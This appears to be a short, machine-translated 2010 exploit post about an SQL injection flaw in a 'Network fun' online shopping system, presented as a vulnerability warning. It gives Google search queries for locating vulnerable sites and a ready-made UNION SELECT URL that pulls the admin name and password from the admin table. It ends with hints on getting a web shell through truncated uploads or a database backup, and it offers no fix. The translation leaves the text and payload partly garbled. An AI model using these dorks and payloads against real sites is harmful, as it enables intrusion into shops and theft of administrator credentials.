Network fun online shopping system HTML static version v2010 injection-vulnerability warning-the black bar safety net

ID MYHACK58:62201026709
Type myhack58
Reporter 佚名
Modified 2010-04-13T00:00:00


Author: Lan3a

This app too many issues.

I directly said method.

Google keywords: inurl:buy. asp? action=show Or: inurl:viewreturn. asp? Page=1

Injection code:

References admin/review. asp? id=5 0%20and%2 0 1=2%20union%20select%201,2,admin,4,password,6,7,8,9,1 0,1 1%20from%20admin

Own re-query the following table, or with a tool injection

Background to take the SHELL very simple, the upload is truncated, the database backup can be.

Original from:http://blog. cfyhack. cn/Wang_qu_shopping_injection/